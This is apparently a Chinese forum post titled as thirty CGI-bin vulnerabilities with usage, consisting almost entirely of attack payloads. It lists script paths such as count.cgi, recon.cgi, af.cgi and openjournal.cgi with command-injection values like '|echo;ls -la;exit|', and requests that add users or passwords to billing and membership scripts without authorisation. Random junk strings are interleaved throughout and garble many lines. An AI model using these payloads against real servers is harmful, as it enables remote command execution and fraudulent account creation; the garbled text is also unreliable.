Cgi-bin 30个漏洞＋使用方法

admin

==============================
9 w9 H& X, f& n# m  _
/smspass.pl
username=username&password=password
  z: p/ `! R; z5 f5 p
/index.cgi
' `8 C+ Z5 Y& s1 o; twei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password

/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

0 F: P4 x* T8 S8 s3 ]+ `: u8 m/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
" K' A; ^3 n) p9 @
! w! L/ N* w, G- ^9 w) ^/ccbill-local.asp
post_values=username:password
7 r$ x2 x7 j% R7 M$ Q3 x$ e
/count.cgi
  `) Y; |) A- ?. p, d3 Zpinfile=|echo;ls -la;exit|
4 g3 l2 c" S4 J( E
; d; o  H! A' v' s/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

! @! q& U' y: s+ @$ |8 p1 Y" E) M/af.cgi
6 X! P* N: W$ n+ G* \_browser_out=|echo;ls -la;exit;|

) D! k- m5 T) e2 a$ T/ h5 c1 c# B+ r/modify.cgi
! k0 x/ k; O! B6 n- ~6 u+ dusername=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
1 ~' ^; v3 v( T/ ^- X- Y! @
6 c; Q) M! G/ t/gx9passwd.cgi
+ q( X* N2 }) M. N: b. G* ~% `cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password

) c7 O2 g/ b, Y; d3 o- W7 Y/recon.cgi
. p1 k4 P5 v0 j9 D- l, b+ q4 psearchoption=3&searchfor=echo;ls -la;exit
7 |; ^& V% L0 U, ^/ n; w0 X
) Y0 [, i) ]8 U4 T1 v/htadd.pl
4 V3 p9 A7 u6 _9 `+ d" w9 o$ bconfigfile=|echo; ls -alt; exit
% {- I. }0 f; ~$ w3 T
1 P( \1 F; T1 @- |, E/gx9passwd.cgi
cmd=ADD&user=username&pass=password
* n7 l# i! k, P7 P
  _* r- Z6 a6 b4 m/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

* C; r4 p$ q* W5 S5 F/ A/cpay.cgi
7 d3 F9 L3 n2 V, y1 R" c# Zcommand=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
# N0 V8 m& G' a! vdo=add&username=username&password=password&wpassword=password

/usercontrol.cgi
( a6 a* t) l5 n8 p, |: jcommand=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

: w- y( l% q5 Q% S/addusr.pl
user=USER&pass=PASS&confirm=PASS
9 o- R) m# m# ~4 G# G  {
/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
  E" u2 }6 R. }# E. P! ^% W$ O  Jpinfile=|echo;pwd;exit|
* C  C* l/ w6 s( o. C! w& S
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
- f$ y4 {1 Q$ _! |username=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
- y: \+ D; ~" X6 B, oADD+;echo;pwd;exit
; ?6 j5 Q( [0 |  h0 [* f  S
/count.cgi
0 t: p7 N9 y" e! apinfile=|echo;pwd;exit|
7 N6 c/ u- T+ @9 s7 c+ ^0 P( a
/recon.cgi
: N. w! s3 p* G6 Esearchoption=1&searchfor=|echo;ls%20-al;exit|

+ t2 c  r4 B6 @8 W0 o/add.cgi
username=username&password=password&expire=30
: v7 a& p% k5 y
==============================
7 N) [4 I, }' ]1 p